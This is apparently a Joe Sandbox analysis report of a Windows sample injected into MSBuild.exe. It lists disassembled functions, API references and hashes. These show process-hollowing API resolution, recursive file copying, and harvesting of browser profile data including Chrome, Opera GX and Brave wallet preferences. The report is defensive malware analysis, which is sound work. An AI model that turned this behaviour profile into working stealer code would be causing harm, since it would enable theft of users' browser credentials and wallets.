Source File: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: e6a4378ef944a74b131cf10b70e7dc44835de18d1aba5a5ebab30bde6206ff17
Instruction ID: cc370d4707f9cf71c60d20e3ec78e0f4798610794d995ae80727f61a3e52dd9a
Opcode Fuzzy Hash: e6a4378ef944a74b131cf10b70e7dc44835de18d1aba5a5ebab30bde6206ff17
Instruction Fuzzy Hash: 8551FAB1D4022A9BDB21EF24DD80ADDB3BCAB54704F4104E6E748B3151DB74AF8A8F54

Function 0104239D Relevance: 6.1, APIs: 4, Instructions: 114COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 010423C2
_memset.LIBCMT ref: 01042436
_memset.LIBCMT ref: 010424AA
_memset.LIBCMT ref: 0104251E

Memory Dump Source

Source File: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: cd4a56d92ebe8f612b610e688c4f30728cb1f6f2652345522dcac12796165e9d
Instruction ID: c809cb747247e77461c328d05a8c9287e38044ae5f8e195e061bcc126d0602cd
Opcode Fuzzy Hash: cd4a56d92ebe8f612b610e688c4f30728cb1f6f2652345522dcac12796165e9d
Instruction Fuzzy Hash: 0C41C971D4022EBBCB14FB60EC47FDD737CAB19700F6448A5B644A7090EAB56A888F55

Function 010529B5 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 010529C1

Part of subcall function 01050954: __getptd_noexit.LIBCMT ref: 01050957
Part of subcall function 01050954: __amsg_exit.LIBCMT ref: 01050964

__amsg_exit.LIBCMT ref: 010529E1
__lock.LIBCMT ref: 010529F1
_free.LIBCMT ref: 01052A21

Memory Dump Source

Source File: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: __amsg_exit$__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3170801528-0
Opcode ID: cdb488327a21f6d606db66afea2a437e5231a64039bb5e551d8e41bc4490d92d
Instruction ID: eede49c299eb2fe19adfe694e10448ae52565e9af987db6df330dd0bd43e0555
Opcode Fuzzy Hash: cdb488327a21f6d606db66afea2a437e5231a64039bb5e551d8e41bc4490d92d
Instruction Fuzzy Hash: 4301C075D01612EBDBA2EF69984579F77A0BF08710F0100A6ECC0A7290C7346941CBC5

Function 0102043F Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,0101F465,00000000,00000001,00000000,00000000,?,01017892,00000000,00000000,00000000), ref: 01020456
GetLastError.KERNEL32(?,0101F465,00000000,00000001,00000000,00000000,?,01017892,00000000,00000000,00000000,00000000,00000000,?,01017E19,00000000), ref: 01020462

Part of subcall function 01020428: CloseHandle.KERNEL32(FFFFFFFE,01020472,?,0101F465,00000000,00000001,00000000,00000000,?,01017892,00000000,00000000,00000000,00000000,00000000), ref: 01020438

___initconout.LIBCMT ref: 01020472

Part of subcall function 010203EA: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,01020419,0101F452,00000000,?,01017892,00000000,00000000,00000000,00000000), ref: 010203FD

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,0101F465,00000000,00000001,00000000,00000000,?,01017892,00000000,00000000,00000000,00000000), ref: 01020487

Memory Dump Source

Source File: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 74d29e90a8ef47c71759cac21cc81bd15133b11ed3bdf24445197a64b089a3fe
Instruction ID: a6321fdc2cff59a9e7a301a778a5309ae62856e8908b28005e9b48bf823853cd
Opcode Fuzzy Hash: 74d29e90a8ef47c71759cac21cc81bd15133b11ed3bdf24445197a64b089a3fe
Instruction Fuzzy Hash: F0F03036500269BBCF732FD5DC08D9E3F66FF583A5B208214FE9985128CA378820DB90

Function 01009DB0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 01009DEF
__IsNonwritableInCurrentImage.LIBCMT ref: 01009EA3

Strings

csm, xrefs: 01009E8D

Memory Dump Source

Source File: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: b2a33ec71aaa54810a6bfae200546f58c42b7029189194b3b029b5ef3d7b2540
Instruction ID: dae7208149e0c21db12e90e88c9609f242e02d5c72f8eef28eef8f893d8dc3f4
Opcode Fuzzy Hash: b2a33ec71aaa54810a6bfae200546f58c42b7029189194b3b029b5ef3d7b2540
Instruction Fuzzy Hash: 9941E630A00249DBEF12DFACC880AEEBBF5AF45318F148195E9985B3D2DB359D45CB90

Function 0100A6BD Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 0100A6E2

Strings

RCC, xrefs: 0100A6FC
MOC, xrefs: 0100A6F4

Memory Dump Source

Source File: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: c62d0c38ce1cf973a97b2fe4e55c3be7b075a7e590f584e2b379b5e8a627d63d
Instruction ID: b0f3c1595640fccfc130b19843a5a75f09dd0bb4de6b72cba54e8432d86c0779
Opcode Fuzzy Hash: c62d0c38ce1cf973a97b2fe4e55c3be7b075a7e590f584e2b379b5e8a627d63d
Instruction Fuzzy Hash: 0A412A71A00209EFEF16DF98CD80AEEBBB5FF48304F188199FA4967291D3359950DB51

Function 010015DF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 010015E6
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0100161E

Part of subcall function 01004EBF: _Yarn.LIBCPMT ref: 01004EDE
Part of subcall function 01004EBF: _Yarn.LIBCPMT ref: 01004F02

Strings

bad locale name, xrefs: 0100162C

Memory Dump Source

Source File: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: 2edcf7725dd9b2d5ecddeebfcd35b3dbe88cb3fbd8e6fcc2b6a2fb704b94c8dc
Instruction ID: d49b5a28e12abe834ebda1a498f8915441aca8ccfd764c79ba7f8af725e052c3
Opcode Fuzzy Hash: 2edcf7725dd9b2d5ecddeebfcd35b3dbe88cb3fbd8e6fcc2b6a2fb704b94c8dc
Instruction Fuzzy Hash: 1BF01771505B909E93319F7A8880447FBE4BE29220B94CE2ED1DEC3A51D730E544CBAE

Analysis Process: MSBuild.exePID: 2000, Parent PID: 5276COMMON

Execution Graph

Execution Coverage:	5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.3%
Total number of Nodes:	2000
Total number of Limit Nodes:	30

Executed Functions

Function 00418A63 Relevance: 231.5, APIs: 121, Strings: 11, Instructions: 518
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75900000,004173DA), ref: 00418A77
GetProcAddress.KERNEL32 ref: 00418A8E
GetProcAddress.KERNEL32 ref: 00418AA5
GetProcAddress.KERNEL32 ref: 00418ABC
GetProcAddress.KERNEL32 ref: 00418AD3
GetProcAddress.KERNEL32 ref: 00418AEA
GetProcAddress.KERNEL32 ref: 00418B01
GetProcAddress.KERNEL32 ref: 00418B18
GetProcAddress.KERNEL32 ref: 00418B2F
GetProcAddress.KERNEL32 ref: 00418B46
GetProcAddress.KERNEL32 ref: 00418B5D
GetProcAddress.KERNEL32 ref: 00418B74
GetProcAddress.KERNEL32 ref: 00418B8B
GetProcAddress.KERNEL32 ref: 00418BA2
GetProcAddress.KERNEL32 ref: 00418BB9
GetProcAddress.KERNEL32 ref: 00418BD0
GetProcAddress.KERNEL32 ref: 00418BE7
GetProcAddress.KERNEL32 ref: 00418BFE
GetProcAddress.KERNEL32 ref: 00418C15
GetProcAddress.KERNEL32 ref: 00418C2C
GetProcAddress.KERNEL32 ref: 00418C43
GetProcAddress.KERNEL32 ref: 00418C5A
GetProcAddress.KERNEL32 ref: 00418C71
GetProcAddress.KERNEL32 ref: 00418C88
GetProcAddress.KERNEL32 ref: 00418C9F
GetProcAddress.KERNEL32 ref: 00418CB6
GetProcAddress.KERNEL32 ref: 00418CCD
GetProcAddress.KERNEL32 ref: 00418CE4
GetProcAddress.KERNEL32 ref: 00418CFB
GetProcAddress.KERNEL32 ref: 00418D12
GetProcAddress.KERNEL32 ref: 00418D29
GetProcAddress.KERNEL32 ref: 00418D40
GetProcAddress.KERNEL32 ref: 00418D57
GetProcAddress.KERNEL32 ref: 00418D6E
GetProcAddress.KERNEL32 ref: 00418D85
GetProcAddress.KERNEL32 ref: 00418D9C
GetProcAddress.KERNEL32 ref: 00418DB3
GetProcAddress.KERNEL32 ref: 00418DCA
GetProcAddress.KERNEL32 ref: 00418DE1
GetProcAddress.KERNEL32 ref: 00418DF8
GetProcAddress.KERNEL32 ref: 00418E0F
GetProcAddress.KERNEL32 ref: 00418E26
GetProcAddress.KERNEL32 ref: 00418E3D
GetProcAddress.KERNEL32(CreateProcessA), ref: 00418E53
GetProcAddress.KERNEL32(GetThreadContext), ref: 00418E69
GetProcAddress.KERNEL32(ReadProcessMemory), ref: 00418E7F
GetProcAddress.KERNEL32(VirtualAllocEx), ref: 00418E95
GetProcAddress.KERNEL32(ResumeThread), ref: 00418EAB
GetProcAddress.KERNEL32(WriteProcessMemory), ref: 00418EC1
GetProcAddress.KERNEL32(SetThreadContext), ref: 00418ED7
LoadLibraryA.KERNEL32(004173DA), ref: 00418EE8
LoadLibraryA.KERNEL32 ref: 00418EF9
LoadLibraryA.KERNEL32 ref: 00418F0A
LoadLibraryA.KERNEL32 ref: 00418F1B
LoadLibraryA.KERNEL32 ref: 00418F2C
LoadLibraryA.KERNEL32 ref: 00418F3D
LoadLibraryA.KERNEL32 ref: 00418F4E
LoadLibraryA.KERNEL32 ref: 00418F5F
LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00418F6F
GetProcAddress.KERNEL32(75FD0000), ref: 00418F8A
GetProcAddress.KERNEL32 ref: 00418FA1
GetProcAddress.KERNEL32 ref: 00418FB8
GetProcAddress.KERNEL32 ref: 00418FCF
GetProcAddress.KERNEL32 ref: 00418FE6
GetProcAddress.KERNEL32(734B0000), ref: 00419005
GetProcAddress.KERNEL32 ref: 0041901C
GetProcAddress.KERNEL32 ref: 00419033
GetProcAddress.KERNEL32 ref: 0041904A
GetProcAddress.KERNEL32 ref: 00419061
GetProcAddress.KERNEL32 ref: 00419078
GetProcAddress.KERNEL32 ref: 0041908F
GetProcAddress.KERNEL32 ref: 004190A6
GetProcAddress.KERNEL32(763B0000), ref: 004190C1
GetProcAddress.KERNEL32 ref: 004190D8
GetProcAddress.KERNEL32 ref: 004190EF
GetProcAddress.KERNEL32 ref: 00419106
GetProcAddress.KERNEL32 ref: 0041911D
GetProcAddress.KERNEL32(750F0000), ref: 0041913C
GetProcAddress.KERNEL32 ref: 00419153
GetProcAddress.KERNEL32 ref: 0041916A
GetProcAddress.KERNEL32 ref: 00419181
GetProcAddress.KERNEL32 ref: 00419198
GetProcAddress.KERNEL32 ref: 004191AF
GetProcAddress.KERNEL32(75A50000), ref: 004191CE
GetProcAddress.KERNEL32 ref: 004191E5
GetProcAddress.KERNEL32 ref: 004191FC
GetProcAddress.KERNEL32 ref: 00419213
GetProcAddress.KERNEL32 ref: 0041922A
GetProcAddress.KERNEL32 ref: 00419241
GetProcAddress.KERNEL32 ref: 00419258
GetProcAddress.KERNEL32 ref: 0041926F
GetProcAddress.KERNEL32 ref: 00419286
GetProcAddress.KERNEL32(75070000), ref: 004192A1
GetProcAddress.KERNEL32 ref: 004192B8
GetProcAddress.KERNEL32 ref: 004192CF
GetProcAddress.KERNEL32 ref: 004192E6
GetProcAddress.KERNEL32 ref: 004192FD
GetProcAddress.KERNEL32(74E50000), ref: 00419318
GetProcAddress.KERNEL32 ref: 0041932F
GetProcAddress.KERNEL32(75320000), ref: 0041934A
GetProcAddress.KERNEL32 ref: 00419361
GetProcAddress.KERNEL32(6F060000), ref: 00419380
GetProcAddress.KERNEL32 ref: 00419397
GetProcAddress.KERNEL32 ref: 004193AE
GetProcAddress.KERNEL32 ref: 004193C5
GetProcAddress.KERNEL32 ref: 004193DC
GetProcAddress.KERNEL32 ref: 004193F3
GetProcAddress.KERNEL32 ref: 0041940A
GetProcAddress.KERNEL32 ref: 00419421
GetProcAddress.KERNEL32(HttpQueryInfoA), ref: 00419437
GetProcAddress.KERNEL32(InternetSetOptionA), ref: 0041944D
GetProcAddress.KERNEL32(74E00000), ref: 00419468
GetProcAddress.KERNEL32 ref: 0041947F
GetProcAddress.KERNEL32 ref: 00419496
GetProcAddress.KERNEL32 ref: 004194AD
GetProcAddress.KERNEL32(74DF0000), ref: 004194C8
GetProcAddress.KERNEL32(6F8D0000), ref: 004194E3
GetProcAddress.KERNEL32 ref: 004194FA
GetProcAddress.KERNEL32 ref: 00419511
GetProcAddress.KERNEL32 ref: 00419528
GetProcAddress.KERNEL32(6C730000,SymMatchString), ref: 00419542

Strings

SetThreadContext, xrefs: 00418EC7
HttpQueryInfoA, xrefs: 00419427
SymMatchString, xrefs: 0041953C
GetThreadContext, xrefs: 00418E59
ReadProcessMemory, xrefs: 00418E6F
CreateProcessA, xrefs: 00418E43
dbghelp.dll, xrefs: 00418F65
VirtualAllocEx, xrefs: 00418E85
ResumeThread, xrefs: 00418E9B
WriteProcessMemory, xrefs: 00418EB1
InternetSetOptionA, xrefs: 0041943D

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
API String ID: 2238633743-2740034357
Opcode ID: 3e30b89850b8473fc7cede02b6692b6796462800fa081e8782096f790b2d890e
Instruction ID: 8ba0d5c8ae2e13c06544b1593b83c2cece409b0c910b42dbc8887f4207037caa
Opcode Fuzzy Hash: 3e30b89850b8473fc7cede02b6692b6796462800fa081e8782096f790b2d890e
Instruction Fuzzy Hash: C752F475910312AFEF1ADFA0FD088243BA7F718707F11A466E91582270E73B4A64EF19

Function 00414CC8 Relevance: 49.3, APIs: 24, Strings: 4, Instructions: 297
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00414D1C
FindFirstFileA.KERNEL32(?,?), ref: 00414D33
_memset.LIBCMT ref: 00414D4F
_memset.LIBCMT ref: 00414D60
StrCmpCA.SHLWAPI(?,004369F8), ref: 00414D81
StrCmpCA.SHLWAPI(?,004369FC), ref: 00414D9B
wsprintfA.USER32 ref: 00414DC2
StrCmpCA.SHLWAPI(?,0043660F), ref: 00414DD6
wsprintfA.USER32 ref: 00414DFF
wsprintfA.USER32 ref: 00414E16

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004176F9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

_memset.LIBCMT ref: 00414E28
lstrcatA.KERNEL32(?,?), ref: 00414E3D
strtok_s.MSVCRT ref: 00414E82
_memset.LIBCMT ref: 00414E94
lstrcatA.KERNEL32(?,?), ref: 00414EA9
strtok_s.MSVCRT ref: 00414EC2
PathMatchSpecA.SHLWAPI(?,00000000), ref: 00414ED7
DeleteFileA.KERNEL32(?,00436A28,0043661D), ref: 00414F90
CopyFileA.KERNEL32(?,?,00000001), ref: 00414FA0

Part of subcall function 00412166: CreateFileA.KERNEL32(00414FAC,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00414FAC,?), ref: 00412181

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414FB6
DeleteFileA.KERNEL32(?,00000000,?,000003E8,00000000), ref: 00414FC1
strtok_s.MSVCRT ref: 00414FE7
FindNextFileA.KERNELBASE(?,?), ref: 00415105
FindClose.KERNEL32(?), ref: 00415125

Strings

%s\%s, xrefs: 00414E10
%s\*.*, xrefs: 00414D10
%s\%s, xrefs: 00414DBC
%s\%s\%s, xrefs: 00414DF9

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: File$_memsetlstrcatwsprintf$Findlstrcpystrtok_s$Delete$CloseCopyCreateFirstMatchNextPathSpecUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
API String ID: 956187361-332874205
Opcode ID: 0b980f5fe467d40f36a48e0aa954b15b20be97dd482f654baf88f773cf79a131
Instruction ID: 9768ecd297fb6e20fca964dbbce2c4256e5a8c732881b8487d541fa13927e408
Opcode Fuzzy Hash: 0b980f5fe467d40f36a48e0aa954b15b20be97dd482f654baf88f773cf79a131
Instruction Fuzzy Hash: 95C12AB1E0021AABCF22EF60DC45AEE777DAF08305F0140A6FA09A3151DB399F858F55

Function 00409D1C Relevance: 44.4, APIs: 20, Strings: 5, Instructions: 610
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004176F9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

FindFirstFileA.KERNEL32(?,?,004367F2,004367EF,00437324,004367EE,?,?,?), ref: 00409DC6
StrCmpCA.SHLWAPI(?,00437328), ref: 00409DE7
StrCmpCA.SHLWAPI(?,0043732C), ref: 00409E01

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417284,004366CF,004366CE,?,?,?,?,0041869F), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417284,004366CF,004366CE,?,?,?,?,0041869F), ref: 00410581

StrCmpCA.SHLWAPI(?,Opera GX,00437330,?,004367F3), ref: 00409E93
StrCmpCA.SHLWAPI(?,Brave,00437350,00437354,00437330,?,004367F3), ref: 0040A015
StrCmpCA.SHLWAPI(?,Preferences), ref: 0040A02F
CopyFileA.KERNEL32(?,?,00000001), ref: 0040A0EF
DeleteFileA.KERNEL32(?), ref: 0040A1BE
StrCmpCA.SHLWAPI(?), ref: 0040A1FC
StrCmpCA.SHLWAPI(?), ref: 0040A266
StrCmpCA.SHLWAPI(0040CCE9), ref: 0040A279

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417731), ref: 00410538

StrCmpCA.SHLWAPI(?), ref: 0040A35C
CopyFileA.KERNEL32(?,?,00000001), ref: 0040A41C
StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0040A4C1
DeleteFileA.KERNEL32(?), ref: 0040A522

Part of subcall function 00408DDB: lstrlenA.KERNEL32(?), ref: 00408FD4
Part of subcall function 00408DDB: lstrlenA.KERNEL32(?), ref: 00408FEF

Part of subcall function 00409549: lstrlenA.KERNEL32(?), ref: 00409970
Part of subcall function 00409549: lstrlenA.KERNEL32(?), ref: 0040998B

StrCmpCA.SHLWAPI(?), ref: 0040A553
CopyFileA.KERNEL32(?,?,00000001), ref: 0040A613
DeleteFileA.KERNEL32(?), ref: 0040A6AA

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

FindNextFileA.KERNEL32(?,?), ref: 0040A76E
FindClose.KERNEL32(?), ref: 0040A782

Strings

Google Chrome, xrefs: 0040A4B9
Preferences, xrefs: 0040A023
Opera GX, xrefs: 00409E8B
Brave, xrefs: 0040A00D
\BraveWallet\Preferences, xrefs: 0040A105

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
